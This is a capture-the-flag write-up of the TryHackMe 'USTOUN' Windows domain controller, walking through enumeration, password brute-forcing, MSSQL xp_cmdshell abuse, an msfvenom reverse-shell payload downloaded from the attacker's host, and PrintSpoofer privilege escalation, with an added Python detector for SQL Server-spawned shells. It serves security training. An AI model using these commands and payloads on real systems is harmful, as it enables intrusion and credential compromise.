TryHackMe – USTOUN writeup
Apr 11
This is a writeup of the USTOUN TryHackMe machine.
First I run a basic nmap scan to find open ports, and the result is:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-04-03 06:37:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ustoun.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ustoun.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
and that it is a Windows machine.
Then I enumerate LDAP with nmap using the following command:
nmap -n -sV --script "ldap* and not brute" 10.10.27.42 # Using anonymous credentials
and the result is:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-04-03 06:21:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ustoun.local, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=ustoun,DC=local
| ldapServiceName: ustoun.local:dc$@USTOUN.LOCAL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=ustoun,DC=local
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=ustoun,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=ustoun,DC=local
| namingContexts: DC=ustoun,DC=local
| namingContexts: CN=Configuration,DC=ustoun,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=ustoun,DC=local
| namingContexts: DC=DomainDnsZones,DC=ustoun,DC=local
| namingContexts: DC=ForestDnsZones,DC=ustoun,DC=local
| isSynchronized: TRUE
| highestCommittedUSN: 114734
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=ustoun,DC=local
| dnsHostName: DC.ustoun.local
| defaultNamingContext: DC=ustoun,DC=local
| currentTime: 20210403062120.0Z
|_ configurationNamingContext: CN=Configuration,DC=ustoun,DC=local
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ustoun.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
From here we can see that the domain is “ustoun.local”. So I put “10.10.27.42 ustoun.local” in my /etc/hosts file.
Afterwards, I try to enumerate Kerberos with nmap using this command:
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='ustoun.local',userdb=/usr/share/seclists/Usernames/cirt-default-usernames.txt 10.10.27.42
It returns some kerberos users:
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| ADMINISTRATOR@ustoun.local
| Administrator@ustoun.local
| administrator@ustoun.local
| Guest@ustoun.local
| GUEST@ustoun.local
|_ guest@ustoun.local
Later I enumerate “smb” too:
smbclient -L \\\\10.10.27.42
Results:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
I can’t connect to these shares without a password.
Using the users found before (administrator, guest), I try to get the LDAP password with “hydra”:
hydra -l administrator -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt 10.10.11.77 ldap2 -V -I -f
and:
hydra -l administrator -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt 10.10.11.77 ldap3 -V -I -f
But nothing.
Now I try to use impacket:
python3 lookupsid.py guest@10.10.11.77
It gives me:
[*] Brute forcing SIDs at 10.10.11.77
[*] StringBinding ncacn_np:10.10.11.77[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1901093607-1666369868-1126869414
498: DC01\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DC01\Administrator (SidTypeUser)
501: DC01\Guest (SidTypeUser)
502: DC01\krbtgt (SidTypeUser)
512: DC01\Domain Admins (SidTypeGroup)
513: DC01\Domain Users (SidTypeGroup)
514: DC01\Domain Guests (SidTypeGroup)
515: DC01\Domain Computers (SidTypeGroup)
516: DC01\Domain Controllers (SidTypeGroup)
517: DC01\Cert Publishers (SidTypeAlias)
518: DC01\Schema Admins (SidTypeGroup)
519: DC01\Enterprise Admins (SidTypeGroup)
520: DC01\Group Policy Creator Owners (SidTypeGroup)
521: DC01\Read-only Domain Controllers (SidTypeGroup)
522: DC01\Cloneable Domain Controllers (SidTypeGroup)
525: DC01\Protected Users (SidTypeGroup)
526: DC01\Key Admins (SidTypeGroup)
527: DC01\Enterprise Key Admins (SidTypeGroup)
553: DC01\RAS and IAS Servers (SidTypeAlias)
571: DC01\Allowed RODC Password Replication Group (SidTypeAlias)
572: DC01\Denied RODC Password Replication Group (SidTypeAlias)
1000: DC01\DC$ (SidTypeUser)
1101: DC01\DnsAdmins (SidTypeAlias)
1102: DC01\DnsUpdateProxy (SidTypeGroup)
1112: DC01\SVC-Kerb (SidTypeUser)
1114: DC01\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
Another 3 users:
krbtgt
SVC-Kerb
DC$
Trying with the auxiliary/scanner/smb/smb_login Metasploit module, I found credentials:
SVC-Kerb:superman
I can’t access the previous shares with these credentials, so I tried to log in to MSSQL using them:
python3 mssqlclient.py SVC-Kerb@10.10.106.177
I had access to MSSQL:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC): Line 1: Changed database context to 'master'.
[*] INFO(DC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
And now I can run MSSQL queries; specifically, I can run the xp_cmdshell function. With this function I created a folder (C:\prv) in which I put (with PowerShell) my .exe payload created with msfvenom. Then I ran exploit/multi/handler as a listener to gain a meterpreter shell:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.28.132 LPORT=4444 -f exe > exploit.exe
# python3 -m http.server 8888
SQL> EXEC xp_cmdshell 'mkdir C:\prv'
SQL> EXEC xp_cmdshell 'powershell.exe -c curl http://10.11.28.132:8888/exploit.exe -o C:\prv\exploit.exe'
Then I activate the multi/handler listener and run my malicious payload from MSSQL.
SQL> EXEC xp_cmdshell 'C:\prv\exploit.exe'
So I got a meterpreter shell, and from here I saw that the current user was dc01\svc-kerb, but I can’t “type” the user flag (access denied).
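Seen from the defender's side, the xp_cmdshell steps above leave a recognisable process-creation trail: sqlservr.exe starts cmd.exe, and everything the command launches hangs below it. The following is an added example, not part of the original writeup, that flags that process tree; the records use Sysmon Event ID 1 field names, and the PIDs, the SQL Server install path and the helper names are constructed for illustration.

```python
import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FETCH = r"powershell.exe -c curl http://10.11.28.132:8888/exploit.exe -o C:\prv\exploit.exe"

def ev(pid, ppid, image, parent, cmdline):
    """Build one record using Sysmon Event ID 1 field names."""
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent, "CommandLine": cmdline}

# Constructed sample: PIDs and the SQL Server install path are invented; the
# command lines mirror the xp_cmdshell calls in the writeup.
EVENTS = [
    ev(5001, 900, CMD, r"C:\Windows\explorer.exe", "cmd.exe"),  # unrelated shell
    ev(5010, 2200, CMD, SQLSERVR, r"cmd.exe /c mkdir C:\prv"),
    ev(5020, 2200, CMD, SQLSERVR, "cmd.exe /c " + FETCH),
    ev(5021, 5020, PS, CMD, FETCH),
    ev(5030, 2200, CMD, SQLSERVR, r"cmd.exe /c C:\prv\exploit.exe"),
    ev(5031, 5030, r"C:\prv\exploit.exe", CMD, r"C:\prv\exploit.exe"),
]

def find_sql_spawned(events):
    """Return (pid, image name, reason) for each process descended from sqlservr.exe.

    Events must be in creation order. PID reuse is ignored here; a production
    rule would key on Sysmon's ProcessGuid rather than the bare PID.
    """
    depth_by_pid = {}  # pid -> generations below sqlservr.exe
    alerts = []
    for e in events:
        name = ntpath.basename(e["Image"]).lower()
        parent = ntpath.basename(e["ParentImage"]).lower()
        if parent == "sqlservr.exe":
            depth = 1
        elif e["ParentProcessId"] in depth_by_pid:
            depth = depth_by_pid[e["ParentProcessId"]] + 1
        else:
            continue  # not in SQL Server's process tree
        depth_by_pid[e["ProcessId"]] = depth
        direct_shell = depth == 1 and name in SHELLS
        reason = "shell spawned by SQL Server" if direct_shell else "descendant of SQL Server"
        alerts.append((e["ProcessId"], name, reason))
    return alerts
```

Calling `find_sql_spawned(EVENTS)` returns the five processes under sqlservr.exe and skips the unrelated shell started from explorer.exe.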
Now, for privilege escalation, I ran the “shell” command in meterpreter, and from there I ran “whoami /priv”; the result was that SeImpersonatePrivilege was enabled.
Googling this, I found that there are some .exe files for privilege escalation: juicy-potato, RogueWinRM, SweetPotato and PrintSpoofer. I tried them all, but only one of them (PrintSpoofer.exe) worked properly. I downloaded it to the victim using PowerShell.
First, from meterpreter, I ran the “shell” command:
meterpreter> shell
Then I download the malicious file to the victim machine:
powershell.exe -c curl http://10.11.28.132:8888/PrintSpoofer.exe -o C:\prv\PrintSpoofer.exe
And, executing it as follows:
PrintSpoofer.exe -i -c cmd
I got a root shell and both user/root flags.
I liked this machine a lot, and thanks to it I learned about “Print Spoofer”.